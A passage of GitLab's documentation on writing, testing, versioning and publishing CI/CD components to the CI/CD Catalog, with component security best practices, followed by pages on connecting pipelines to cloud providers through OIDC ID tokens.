Pipeline configuration and component configuration are not processed independently. When a pipeline starts, any included component configuration [merges](../yaml/includes.md#merge-method-for-include) into the pipeline's configuration. If your pipeline and the component both contain configuration with the same name, they can interact in unexpected ways. For example, two jobs with the same name would merge together into a single job. Similarly, a component using `extends` for configuration with the same name as a job in your pipeline could extend the wrong configuration. Make sure your pipeline and the component do not share any configuration with the same name, unless you intend to [override](../yaml/includes.md#override-included-configuration-values) the component's configuration. To use GitLab.com components on a GitLab Self-Managed instance, you must [mirror the component project](#use-a-gitlabcom-component-on-gitlab-self-managed). {{< alert type="warning" >}} If a component requires the use of tokens, passwords, or other sensitive data to function, be sure to audit the component's source code to verify that the data is only used to perform actions that you expect and authorize. You should also use tokens and secrets with the minimum permissions, access, or scope required to complete the action. {{< /alert >}} ### Component versions In order of highest priority first, the component version can be: - A commit SHA, for example `e3262fdd0914fa823210cdb79a8c421e2cef79d8`. - A tag, for example: `1.0.0`. If a tag and commit SHA exist with the same name, the commit SHA takes precedence over the tag. Components released to the CI/CD Catalog should be tagged with a [semantic version](#semantic-versioning). - A branch name, for example `main`. If a branch and tag exist with the same name, the tag takes precedence over the branch. - `~latest`, which always points to the latest semantic version published in the CI/CD Catalog. 
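Each entry below shows one of these version formats for the same component (the project path is illustrative); a real pipeline would use only one of them:

```yaml
include:
  # Commit SHA: most precise, takes precedence over a tag with the same name.
  - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@e3262fdd0914fa823210cdb79a8c421e2cef79d8
  # Tag: a semantic version released to the CI/CD Catalog.
  - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@1.0.0
  # Branch name: useful for testing unreleased changes.
  - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@main
  # Latest semantic version published in the catalog.
  - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@~latest
```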
Use `~latest` only if you want to use the absolute latest version at all times, which could include breaking changes. `~latest` does not include pre-releases, for example `1.0.1-rc`, which are not considered production-ready. You can use any version supported by the component, but using a version published to the CI/CD catalog is recommended. The version referenced with a commit SHA or branch name might not be published in the CI/CD catalog, but could be used for testing. #### Semantic version ranges {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/450835) in GitLab 16.11 {{< /history >}} When [referencing a CI/CD catalog component](#component-versions), you can use a special format to specify the latest [semantic version](#semantic-versioning) in a range. This approach offers significant benefits for both consumers and authors of components: - For users, using version ranges is an excellent way to automatically receive minor or patch updates without risking breaking changes from major releases. This ensures your pipelines stay up-to-date with the latest bug fixes and security patches while maintaining stability. - For component authors, the use of version ranges allows major version releases without risk of immediately breaking existing pipelines. Users who have specified version ranges continue to use the latest compatible minor or patch version, giving them time to update their pipelines at their own pace. To specify the latest release of: - A minor version, use both the major and minor version numbers in the reference, but not the patch version number. For example, use `1.1` to use the latest version that starts with `1.1`, including `1.1.0` or `1.1.9`, but not `1.2.0`. - A major version, use only the major version number in the reference. For example, use `1` to use the latest version that starts with `1.`, like `1.0.0` or `1.9.9`, but not `2.0.0`. - All versions, use `~latest` to use the latest released version. 
For example, a component is released in this exact order: 1. `1.0.0` 1. `1.1.0` 1. `2.0.0` 1. `1.1.1` 1. `1.2.0` 1. `2.1.0` 1. `2.0.1` In this example, referencing the component with: - `1` would use the `1.2.0` version. - `1.1` would use the `1.1.1` version. - `~latest` would use the `2.1.0` version. Pre-release versions are never fetched when referencing a version range. To fetch a pre-release version, specify the full version, for example `1.0.1-rc`. ## Write a component This section describes some best practices for creating high quality component projects. ### Manage dependencies While it's possible for a component to use other components in turn, make sure to carefully select the dependencies. To manage dependencies, you should: - Keep dependencies to a minimum. A small amount of duplication is usually better than having dependencies. - Rely on local dependencies whenever possible. For example, using [`include:local`](../yaml/_index.md#includelocal) is a good way to ensure the same Git SHA is used across multiple files. - When depending on components from other projects, pin their version to a release from the catalog rather than using moving target versions such as `~latest` or a Git reference. Using a release or Git SHA guarantees that you are fetching the same revision all the time and that consumers of your component get consistent behavior. - Update your dependencies regularly by pinning them to newer releases. Then publish a new release of your components with updated dependencies. - Evaluate the permissions of dependencies, and use dependencies that require the least amount of permissions. For example, if you need to build an image, consider using [Buildah](https://buildah.io/) instead of Docker, so that you don't require a Runner with a privileged Docker daemon. ### Write a clear `README.md` Each component project should have clear and comprehensive documentation. 
To write a good `README.md` file: - The documentation should start with a summary of the capabilities that the components in the project provide. - If the project contains multiple components, use a [table of contents](../../user/markdown.md#table-of-contents) to help users quickly jump to a specific component's details. - Add a `## Components` section with sub-sections like `### Component A` for each component in the project. - In each component section: - Add a description of what the component does. - Add at least one YAML example showing how to use it. - If the component uses inputs, add a table showing all inputs with name, description, type, and default value. - If the component uses any variables or secrets, those should be documented too. - A `## Contribute` section is recommended if contributions are welcome. If a component needs more instructions, add additional documentation in a Markdown file in the component directory and link to it from the main `README.md` file. For example: ```plaintext README.md # with links to the specific docs.md templates/ ├── component-1/ │ ├── template.yml │ └── docs.md └── component-2/ ├── template.yml └── docs.md ``` For an example of a component `README.md`, see the [Deploy to AWS with GitLab CI/CD component's `README.md`](https://gitlab.com/components/aws/-/blob/main/README.md). ### Test the component Testing CI/CD components as part of the development workflow is strongly recommended and helps ensure consistent behavior. Test changes in a CI/CD pipeline (like any other project) by creating a `.gitlab-ci.yml` in the root directory. Make sure to test both the behavior and potential side-effects of the component. You can use the [GitLab API](../../api/rest/_index.md) if needed. 
For example: ```yaml include: # include the component located in the current project from the current SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/my-component@$CI_COMMIT_SHA inputs: stage: build stages: [build, test, release] # Check if `component job of my-component` is added. # This example job could also test that the included component works as expected. # You can inspect data generated by the component, use GitLab API endpoints, or third-party tools. ensure-job-added: stage: test image: badouralix/curl-jq # Replace "component job of my-component" with the job name in your component. script: - | route="${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/pipelines/${CI_PIPELINE_ID}/jobs" count=`curl --silent "$route" | jq 'map(select(.name | contains("component job of my-component"))) | length'` if [ "$count" != "1" ]; then exit 1; else echo "Component Job present" fi # If the pipeline is for a new tag with a semantic version, and all previous jobs succeed, # create the release. create-release: stage: release image: registry.gitlab.com/gitlab-org/release-cli:latest script: echo "Creating release $CI_COMMIT_TAG" rules: - if: $CI_COMMIT_TAG release: tag_name: $CI_COMMIT_TAG description: "Release $CI_COMMIT_TAG of components repository $CI_PROJECT_PATH" ``` After committing and pushing changes, the pipeline tests the component, then creates a release if the earlier jobs pass. {{< alert type="note" >}} Authentication is necessary if the project is private. {{< /alert >}} #### Test a component against sample files In some cases, components require source files to interact with. For example, a component that builds Go source code likely needs some samples of Go to test against. Alternatively, a component that builds Docker images likely needs some sample Dockerfiles to test against. You can include sample files like these directly in the component project, to be used during component testing. 
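For example, a test job in the component project's own pipeline could point the component at sample sources stored in the repository. The component name, the `source-dir` input, and the sample file path here are hypothetical:

```yaml
include:
  # Include the component from the current project at the current SHA.
  - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/go-build@$CI_COMMIT_SHA
    inputs:
      # Hypothetical input telling the component where the sample sources live.
      source-dir: tests/sample-go-app
```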
You can learn more in [examples for testing a component](examples.md#test-a-component).

### Avoid hard-coding instance or project-specific values

When [using another component](#use-a-component) in your component, use `$CI_SERVER_FQDN` instead of your instance's Fully Qualified Domain Name (like `gitlab.com`).

When accessing the GitLab API in your component, use the `$CI_API_V4_URL` instead of the full URL and path for your instance (like `https://gitlab.com/api/v4`).

These [predefined variables](../variables/predefined_variables.md) ensure that your component also works when used on another instance, for example when using [a GitLab.com component on a GitLab Self-Managed instance](#use-a-gitlabcom-component-on-gitlab-self-managed).

### Do not assume API resources are always public

Ensure that the component and its testing pipeline also work [on GitLab Self-Managed](#use-a-gitlabcom-component-on-gitlab-self-managed). While some API resources of public projects on GitLab.com can be accessed with unauthenticated requests, on a GitLab Self-Managed instance a component project could be mirrored as a private or internal project. Make sure users can optionally provide an access token through inputs or variables to authenticate requests on GitLab Self-Managed instances.

### Avoid using global keywords

Avoid using [global keywords](../yaml/_index.md#global-keywords) in a component. Using these keywords in a component affects all jobs in a pipeline, including jobs directly defined in the main `.gitlab-ci.yml` or in other included components.

As an alternative to global keywords:

- Add the configuration directly to each job, even if it creates some duplication in the component configuration.
- Use the [`extends`](../yaml/_index.md#extends) keyword in the component, but use unique names that reduce the risk of naming conflicts when the component is merged into the configuration.
For example, avoid using the `default` global keyword:

```yaml
# Not recommended
default:
  image: ruby:3.0

rspec-1:
  script: bundle exec rspec dir1/

rspec-2:
  script: bundle exec rspec dir2/
```

Instead, you can:

- Add the configuration to each job explicitly:

  ```yaml
  rspec-1:
    image: ruby:3.0
    script: bundle exec rspec dir1/

  rspec-2:
    image: ruby:3.0
    script: bundle exec rspec dir2/
  ```

- Use `extends` to reuse configuration:

  ```yaml
  .rspec-image:
    image: ruby:3.0

  rspec-1:
    extends:
      - .rspec-image
    script: bundle exec rspec dir1/

  rspec-2:
    extends:
      - .rspec-image
    script: bundle exec rspec dir2/
  ```

### Replace hardcoded values with inputs

Avoid using hardcoded values in CI/CD components. Hardcoded values can force component users to review the component's internal details and adapt their pipeline to work with the component.

A common keyword with problematic hard-coded values is `stage`. If a component job's stage is hardcoded, all pipelines using the component **must** either define the exact same stage, or [override](../yaml/includes.md#override-included-configuration-values) the configuration.

The preferred method is to use the [`input` keyword](../inputs/_index.md) for dynamic component configuration. The component user can specify the exact value they need.

For example, to create a component with `stage` configuration that can be defined by users:

- In the component configuration:

  ```yaml
  spec:
    inputs:
      stage:
        default: test
  ---
  unit-test:
    stage: $[[ inputs.stage ]]
    script: echo unit tests

  integration-test:
    stage: $[[ inputs.stage ]]
    script: echo integration tests
  ```

- In a project using the component:

  ```yaml
  stages: [verify, release]

  include:
    - component: $CI_SERVER_FQDN/myorg/ruby/test@1.0.0
      inputs:
        stage: verify
  ```

#### Define job names with inputs

Similar to the values for the `stage` keyword, you should avoid hard-coding job names in CI/CD components.
When your component's users can customize job names, they can prevent conflicts with the existing names in their pipelines. Users could also include a component multiple times with different input options by using different names. Use `inputs` to allow your component's users to define a specific job name, or a prefix for the job name. For example: ```yaml spec: inputs: job-prefix: description: "Define a prefix for the job name" job-name: description: "Alternatively, define the job's name" job-stage: default: test --- "$[[ inputs.job-prefix ]]-scan-website": stage: $[[ inputs.job-stage ]] script: - scan-website-1 "$[[ inputs.job-name ]]": stage: $[[ inputs.job-stage ]] script: - scan-website-2 ``` ### Replace custom CI/CD variables with inputs When using CI/CD variables in a component, evaluate if the `inputs` keyword should be used instead. Avoid asking users to define custom variables to configure components when `inputs` is a better solution. Inputs are explicitly defined in the component's `spec` section, and have better validation than variables. For example, if a required input is not passed to the component, GitLab returns a pipeline error. By contrast, if a variable is not defined, its value is empty, and there is no error. For example, use `inputs` instead of variables to configure a scanner's output format: - In the component configuration: ```yaml spec: inputs: scanner-output: default: json --- my-scanner: script: my-scan --output $[[ inputs.scanner-output ]] ``` - In the project using the component: ```yaml include: - component: $CI_SERVER_FQDN/path/to/project/my-scanner@1.0.0 inputs: scanner-output: yaml ``` In other cases, CI/CD variables might still be preferred. For example: - Use [predefined variables](../variables/predefined_variables.md) to automatically configure a component to match a user's project. 
- Ask users to store sensitive values as [masked or protected CI/CD variables in project settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). ## CI/CD Catalog {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/407249) as an [experiment](../../policy/development_stages_support.md#experiment) in GitLab 16.1. - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/432045) to [beta](../../policy/development_stages_support.md#beta) in GitLab 16.7. - [Made Generally Available](https://gitlab.com/gitlab-org/gitlab/-/issues/454306) in GitLab 17.0. {{< /history >}} The [CI/CD Catalog](https://gitlab.com/explore/catalog) is a list of projects with published CI/CD components you can use to extend your CI/CD workflow. Anyone can [create a component project](#create-a-component-project) and add it to the CI/CD Catalog, or contribute to an existing project to improve the available components. For a click-through demo, see [the CI/CD Catalog beta Product Tour](https://gitlab.navattic.com/cicd-catalog). <!-- Demo published on 2024-01-24 --> ### View the CI/CD Catalog To access the CI/CD Catalog and view the published components that are available to you: 1. On the left sidebar, select **Search or go to**. 1. Select **Explore**. 1. Select **CI/CD Catalog**. Alternatively, if you are already in the [pipeline editor](../pipeline_editor/_index.md) in your project, you can select **CI/CD Catalog**. Visibility of components in the CI/CD catalog follows the component source project's [visibility setting](../../user/public_access.md). Components with source projects set to: - Private are visible only to users assigned at least the Guest role for the source component project. To use a component, you must have at least the Reporter role. - Internal are visible only to users logged into the GitLab instance. 
- Public are visible to anyone with access to the GitLab instance. ### Publish a component project To publish a component project in the CI/CD catalog, you must: 1. Set the project as a catalog project. 1. Publish a new release. #### Set a component project as a catalog project To make published versions of a component project visible in the CI/CD catalog, you must set the project as a catalog project. Prerequisites: - You must have the Owner role for the project. To set the project as a catalog project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > General**. 1. Expand **Visibility, project features, permissions**. 1. Turn on the **CI/CD Catalog project** toggle. The project only becomes findable in the catalog after you publish a new release. To use automation to enable this setting, you can use the [`mutationcatalogresourcescreate`](../../api/graphql/reference/_index.md#mutationcatalogresourcescreate) GraphQL endpoint. [Issue 463043](https://gitlab.com/gitlab-org/gitlab/-/issues/463043) proposes to expose this in the REST API as well. #### Publish a new release CI/CD components can be [used](#use-a-component) without being listed in the CI/CD catalog. However, publishing a component's releases in the catalog makes it discoverable to other users. Prerequisites: - You must have at least the Maintainer role for the project. - The project must: - Be set as a [catalog project](#set-a-component-project-as-a-catalog-project). - Have a [project description](../../user/project/working_with_projects.md#edit-a-project) defined. - Have a `README.md` file in the root directory for the commit SHA of the tag being released. - Have at least one [CI/CD component in the `templates/` directory](#directory-structure) for the commit SHA of the tag being released. 
- You must use the [`release` keyword](../yaml/_index.md#release) in a CI/CD job to create the release, not the [Releases API](../../api/releases/_index.md#create-a-release).

To publish a new version of the component to the catalog:

1. Add a job to the project's `.gitlab-ci.yml` file that uses the `release` keyword to create the new release when a tag is created. You should configure the tag pipeline to [test the components](#test-the-component) before running the release job. For example:

   ```yaml
   create-release:
     stage: release
     image: registry.gitlab.com/gitlab-org/release-cli:latest
     script: echo "Creating release $CI_COMMIT_TAG"
     rules:
       - if: $CI_COMMIT_TAG
     release:
       tag_name: $CI_COMMIT_TAG
       description: "Release $CI_COMMIT_TAG of components in $CI_PROJECT_PATH"
   ```

1. Create a [new tag](../../user/project/repository/tags/_index.md#create-a-tag) for the release, which should trigger a tag pipeline that contains the job responsible for creating the release. The tag must use [semantic versioning](#semantic-versioning).

After the release job completes successfully, the release is created and the new version is published to the CI/CD catalog.

#### Semantic versioning

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/427286) in GitLab 16.10.

{{< /history >}}

When tagging and [releasing new versions](#publish-a-new-release) of components to the Catalog, you must use [semantic versioning](https://semver.org). Semantic versioning is the standard for communicating that a change is a major, minor, patch, or other kind of change.

For example, `1.0.0`, `2.3.4`, and `1.0.0-alpha` are all valid semantic versions.

### Unpublish a component project

To remove a component project from the catalog, turn off the [**CI/CD Catalog project**](#set-a-component-project-as-a-catalog-project) toggle in the project settings.

{{< alert type="warning" >}}

This action destroys the metadata about the component project and its versions published in the catalog.
The project and its repository still exist, but are not visible in the catalog. {{< /alert >}} To publish the component project in the catalog again, you need to [publish a new release](#publish-a-new-release). ### Verified component creators {{< history >}} - [Introduced for GitLab.com](https://gitlab.com/gitlab-org/gitlab/-/issues/433443) in GitLab 16.11 - [Introduced for GitLab Self-Managed and GitLab Dedicated](https://gitlab.com/gitlab-org/gitlab/-/issues/460125) in GitLab 18.1 {{< /history >}} Some CI/CD components are badged with an icon to show that the component was created and is maintained by users verified by GitLab or the instance administrator: - GitLab-maintained ({{< icon name="tanuki-verified" >}}): GitLab.com components that are created and maintained by GitLab. - GitLab Partner ({{< icon name="partner-verified" >}}): GitLab.com components that are independently created and maintained by a GitLab-verified partner. GitLab partners can contact a member of the GitLab Partner Alliance to have their namespace on GitLab.com flagged as GitLab-verified. Then any CI/CD components located in the namespace are badged as GitLab Partner components. The Partner Alliance member creates an [internal request issue (GitLab team members only)](https://gitlab.com/gitlab-com/support/internal-requests/-/issues/new?issuable_template=CI%20Catalog%20Badge%20Request) on behalf of the verified partner. {{< alert type="warning" >}} GitLab Partner-created components are provided **as-is**, without warranty of any kind. An end user's use of a GitLab Partner-created component is at their own risk and GitLab shall have no indemnification obligations nor any liability of any type with respect to the end user's use of the component. The end user's use of such content and any liability related thereto shall be between the publisher of the content and the end user. 
{{< /alert >}} - Verified creator ({{< icon name="check-sm" >}}): Components created and maintained by a user verified by an administrator. #### Set a component as maintained by a verified creator {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced for GitLab Self-Managed and GitLab Dedicated](https://gitlab.com/gitlab-org/gitlab/-/issues/460125) in GitLab 18.1 {{< /history >}} A GitLab administrator can set a CI/CD component as created and maintained by a verified creator: 1. Open GraphiQL in the instance with your administrator account, for example at: `https://gitlab.example.com/-/graphql-explorer`. 1. Run this query, replacing `root-level-group` with the root namespace of the component to verify: ```graphql mutation { verifiedNamespaceCreate(input: { namespacePath: "root-level-group", verificationLevel: VERIFIED_CREATOR_SELF_MANAGED }) { errors } } ``` After the query completes, all components in projects in the root namespace are verified. The **Verified creator** badge displays next to the component names in the CI/CD catalog. To remove the badge from a component, repeat the query with `UNVERIFIED` for `verificationLevel`. ## Convert a CI/CD template to a component Any existing CI/CD template that you use in projects by using the `include:` syntax can be converted to a CI/CD component: 1. Decide if you want the component to be grouped with other components as part of an existing [component project](#component-project), or [create a new component project](#create-a-component-project). 1. Create a YAML file in the component project according to the [directory structure](#directory-structure). 1. Copy the content of the original template YAML file into the new component YAML file. 1. Refactor the new component's configuration to: - Follow the guidance on [writing a component](#write-a-component). 
- Improve the configuration, for example by enabling [merge request pipelines](../pipelines/merge_request_pipelines.md) or making it [more efficient](../pipelines/pipeline_efficiency.md). 1. Leverage the `.gitlab-ci.yml` in the components repository to [test changes to the component](#test-the-component). 1. Tag and [release the component](#publish-a-new-release). You can learn more by following a practical example for [migrating the Go CI/CD template to CI/CD component](examples.md#cicd-component-migration-example-go). ## Use a GitLab.com component on GitLab Self-Managed {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} The CI/CD catalog of a fresh install of a GitLab instance starts with no published CI/CD components. To populate your instance's catalog, you can: - [Publish your own components](#publish-a-component-project). - Mirror components from GitLab.com in your GitLab Self-Managed instance. To mirror a GitLab.com component in your GitLab Self-Managed instance: 1. Make sure that [network outbound requests](../../security/webhooks.md) are allowed for `gitlab.com`. 1. [Create a group](../../user/group/_index.md#create-a-group) to host the component projects (recommended group: `components`). 1. [Create a mirror of the component project](../../user/project/repository/mirror/pull.md) in the new group. 1. Write a [project description](../../user/project/working_with_projects.md#edit-a-project) for the component project mirror because mirroring repositories does not copy the description. 1. [Set the self-hosted component project as a catalog resource](#set-a-component-project-as-a-catalog-project). 1. Publish [a new release](../../user/project/releases/_index.md) in the self-hosted component project by [running a pipeline](../pipelines/_index.md#run-a-pipeline-manually) for a tag (usually the latest tag). 
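Assuming the mirror was created in the recommended `components` group and keeps the same project and component names, projects on your instance could then reference the mirrored component with your instance's FQDN, for example:

```yaml
include:
  # Project path and version are illustrative; adjust them to your mirror.
  - component: $CI_SERVER_FQDN/components/secret-detection/secret-detection@1.0.0
```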
## CI/CD component security best practices

### For component users

As anyone can publish components to the catalog, you should carefully review components before using them in your project. Use of GitLab CI/CD components is at your own risk and GitLab cannot guarantee the security of third-party components.

When using third-party CI/CD components, consider the following security best practices:

- **Audit and review component source code**: Carefully examine the code to ensure it's free of malicious content.
- **Minimize access to credentials and tokens**:
  - Audit the component's source code to verify that any credentials or tokens are only used to perform actions that you expect and authorize.
  - Use minimally scoped access tokens.
  - Avoid using long-lived access tokens or credentials.
  - Audit use of credentials and tokens used by CI/CD components.
- **Use pinned versions**: Pin CI/CD components to a specific commit SHA (preferred) or release version tag to ensure the integrity of the component used in a pipeline. Only use release tags if you trust the component maintainer. Avoid using `latest`.
- **Store secrets securely**: Do not store secrets in CI/CD configuration files. Avoid storing secrets and credentials in project settings if you can use an external secret management solution instead.
- **Use ephemeral, isolated runner environments**: Run component jobs in temporary, isolated environments when possible. Be aware of [security risks](https://docs.gitlab.com/runner/security) with self-managed runners.
- **Securely handle cache and artifacts**: Do not pass cache or artifacts from other jobs in your pipeline to CI/CD component jobs unless absolutely necessary.
- **Limit `CI_JOB_TOKEN` access**: Restrict [CI/CD job token (`CI_JOB_TOKEN`) project access and permissions](../jobs/ci_job_token.md#control-job-token-access-to-your-project) for projects using CI/CD components.
- **Review CI/CD component changes**: Carefully review all changes to the CI/CD component configuration before changing to use an updated commit SHA or release tag for the component.
- **Audit custom container images**: Carefully review any custom container images used by the CI/CD component to ensure they are free of malicious content.

### For component maintainers

To maintain secure and trustworthy CI/CD components and ensure the integrity of the pipeline configuration you deliver to users, follow these best practices:

- **Use two-factor authentication (2FA)**: Ensure all CI/CD component project maintainers and owners have [2FA enabled](../../user/profile/account/two_factor_authentication.md#enable-two-factor-authentication), or enforce [2FA for all users in the group](../../security/two_factor_authentication.md#enforce-2fa-for-all-users-in-a-group).
- **Use protected branches**:
  - Use [protected branches](../../user/project/repository/branches/protected.md) for component project releases.
  - Protect the default branch, and protect all release branches [using wildcard rules](../../user/project/repository/branches/protected.md#use-wildcard-rules).
  - Require everyone to submit merge requests for changes to protected branches. Set the **Allowed to push and merge** option to `No one` for protected branches.
  - Block force pushes to protected branches.
- **Sign all commits**: [Sign all commits](../../user/project/repository/signed_commits/_index.md) to the component project.
- **Discourage using `latest`**: Avoid including examples in your `README.md` that use `@latest`.
- **Limit dependency on caches and artifacts from other jobs**: Only use cache and artifacts from other jobs in CI/CD components if absolutely necessary.
- **Update CI/CD component dependencies**: Check for and apply updates to dependencies regularly.
- **Review changes carefully**:
  - Carefully review all changes to the CI/CD component pipeline configuration before merging into default or release branches.
  - Use [merge request approvals](../../user/project/merge_requests/approvals/_index.md) for all user-facing changes to CI/CD component catalog projects.

## Troubleshooting

### `content not found` message

You might receive an error message similar to the following when using the `~latest` version qualifier to reference a component hosted by a [catalog project](#set-a-component-project-as-a-catalog-project):

```plaintext
This GitLab CI configuration is invalid: Component 'gitlab.com/my-namespace/my-project/my-component@~latest' - content not found
```

The `~latest` behavior [was updated](https://gitlab.com/gitlab-org/gitlab/-/issues/442238) in GitLab 16.10. It now refers to the latest semantic version of the catalog resource. To resolve this issue, [create a new release](#publish-a-new-release).

### Error: `Build component error: Spec must be a valid json schema`

If a component has invalid formatting, you might not be able to create a release and could receive an error like `Build component error: Spec must be a valid json schema`.

This error can be caused by an empty `spec:inputs` section. If your configuration does not use any inputs, you can make the `spec` section empty instead. For example:

```yaml
spec:
---

my-component:
  script: echo
```
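For comparison, a component whose `spec` does declare an input would look something like the following minimal sketch (the job name and input are illustrative; interpolation uses GitLab's `$[[ inputs.* ]]` syntax):

```yaml
spec:
  inputs:
    stage:
      default: test
---
my-component:
  stage: $[[ inputs.stage ]]
  script: echo
```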
https://docs.gitlab.com/ci/cloud_services
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/cloud_services
[ "doc", "ci", "cloud_services" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Connect to cloud services
null
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [ID tokens](../yaml/_index.md#id_tokens) to support any OIDC provider, including HashiCorp Vault, [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/356986) in GitLab 15.7.

{{< /history >}}

{{< alert type="warning" >}}

`CI_JOB_JWT` and `CI_JOB_JWT_V2` were [deprecated in GitLab 15.9](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and are scheduled to be removed in GitLab 17.0. Use [ID tokens](../yaml/_index.md#id_tokens) instead.

{{< /alert >}}

GitLab CI/CD supports [OpenID Connect (OIDC)](https://openid.net/developers/how-connect-works/) to give your build and deployment jobs access to cloud credentials and services. Historically, teams stored secrets in projects or applied permissions on the GitLab Runner instance to build and deploy. OIDC-capable [ID tokens](../yaml/_index.md#id_tokens) are configurable in the CI/CD job, allowing you to follow a scalable and least-privilege security approach. In GitLab 15.6 and earlier, you must use `CI_JOB_JWT_V2` instead of an ID token, but it is not customizable.

## Prerequisites

- Account on GitLab.
- Access to a cloud provider that supports OIDC to configure authorization and create roles. ID tokens support cloud providers with OIDC, including:
  - AWS
  - Azure
  - GCP
  - HashiCorp Vault

{{< alert type="note" >}}

Configuring OIDC enables JWT token access to the target environments for all pipelines. When you configure OIDC for a pipeline, you should complete a software supply chain security review for the pipeline, focusing on the additional access. For more information about supply chain attacks, see [How a DevOps Platform helps protect against supply chain attacks](https://about.gitlab.com/blog/2021/04/28/devops-platform-supply-chain-attacks/).

{{< /alert >}}

## Use cases

- Removes the need to store secrets in your GitLab group or project.
  Temporary credentials can be retrieved from your cloud provider through OIDC.
- Provides temporary access to cloud resources with granular GitLab conditionals including a group, project, branch, or tag.
- Enables you to define separation of duties in the CI/CD job with conditional access to environments. Historically, apps may have been deployed with a designated GitLab Runner that had only access to staging or production environments. This led to Runner sprawl as each machine had dedicated permissions.
- Allows instance runners to securely access multiple cloud accounts. The access is determined by the JWT token, which is specific to the user running the pipeline.
- Removes the need to create logic to rotate secrets by retrieving temporary credentials by default.

## ID token authentication for cloud services

Each job can be configured with ID tokens, which are provided as a CI/CD variable containing the [token payload](../secrets/id_token_authentication.md#token-payload). These JWTs can be used to authenticate with the OIDC-supported cloud provider such as AWS, Azure, GCP, or Vault.

### Authorization workflow

```mermaid
%%{init: { "fontFamily": "GitLab Sans" }}%%
sequenceDiagram
    accTitle: Authorization workflow
    accDescr: The flow of authorization requests between GitLab and a cloud provider.

    participant GitLab
    Note right of Cloud: Create OIDC identity provider
    Note right of Cloud: Create role with conditionals
    Note left of GitLab: CI/CD job with ID token
    GitLab->>+Cloud: Call cloud API with ID token
    Note right of Cloud: Decode & verify JWT with public key (https://gitlab.com/oauth/discovery/keys)
    Note right of Cloud: Validate audience defined in OIDC
    Note right of Cloud: Validate conditional (sub, aud) role
    Note right of Cloud: Generate credential or fetch secret
    Cloud->>GitLab: Return temporary credential
    Note left of GitLab: Perform operation
```

1. Create an OIDC identity provider in the cloud (for example, AWS, Azure, GCP, Vault).
1.
Create a conditional role in the cloud service that filters to a group, project, branch, or tag.
1. The CI/CD job includes an ID token which is a JWT token. You can use this token for authorization with your cloud API.
1. The cloud verifies the token, validates the conditional role from the payload, and returns a temporary credential.

## Configure a conditional role with OIDC claims

To configure the trust between GitLab and OIDC, you must create a conditional role in the cloud provider that checks against the JWT. The condition is validated against the JWT to create a trust specifically against two claims, the audience and subject.

- Audience or `aud`: Configured as part of the ID token:

  ```yaml
  job_needing_oidc_auth:
    id_tokens:
      OIDC_TOKEN:
        aud: https://oidc.provider.com
    script:
      - echo $OIDC_TOKEN
  ```

- Subject or `sub`: A concatenation of metadata describing the GitLab CI/CD workflow including the group, project, branch, and tag. The `sub` field is in the following format:

  - `project_path:{group}/{project}:ref_type:{type}:ref:{branch_name}`

  | Filter type | Example |
  |----------------------------------------------------|---------|
  | Filter to any branch | Wildcard supported. `project_path:mygroup/myproject:ref_type:branch:ref:*` |
  | Filter to specific project, main branch | `project_path:mygroup/myproject:ref_type:branch:ref:main` |
  | Filter to all projects under a group | Wildcard supported. `project_path:mygroup/*:ref_type:branch:ref:main` |
  | Filter to a Git tag | Wildcard supported. `project_path:mygroup/*:ref_type:tag:ref:1.0` |

## OIDC authorization with your cloud provider

To connect with your cloud provider, see the following tutorials:

- [Configure OpenID Connect in AWS](aws/_index.md)
- [Configure OpenID Connect in Azure](azure/_index.md)
- [Configure OpenID Connect in Google Cloud](google_cloud/_index.md)
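The `sub` filters in the table above are plain wildcard patterns that the cloud provider matches against the token's `sub` string. Purely as an illustration of how such a match behaves (the values are hypothetical; the real evaluation happens on the provider side), a shell `case` pattern behaves the same way:

```shell
# An example sub claim for a pipeline on a feature branch (illustrative values):
SUB="project_path:mygroup/myproject:ref_type:branch:ref:feature/login"

# The "any branch" filter from the table above:
FILTER="project_path:mygroup/myproject:ref_type:branch:ref:*"

# An unquoted variable in a case pattern is expanded and then treated as a
# glob pattern, mirroring the provider's wildcard match:
case "$SUB" in
  $FILTER) echo "match" ;;
  *)       echo "no match" ;;
esac
```

A `sub` for a different project or ref type would fall through to the `no match` branch, which is why narrowing the filter is the main lever for least-privilege access.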
https://docs.gitlab.com/ci/cloud_services/google_cloud
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/cloud_services/_index.md
2025-08-13
doc/ci/cloud_services/google_cloud
[ "doc", "ci", "cloud_services", "google_cloud" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Configure OpenID Connect with GCP Workload Identity Federation
null
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< alert type="warning" >}}

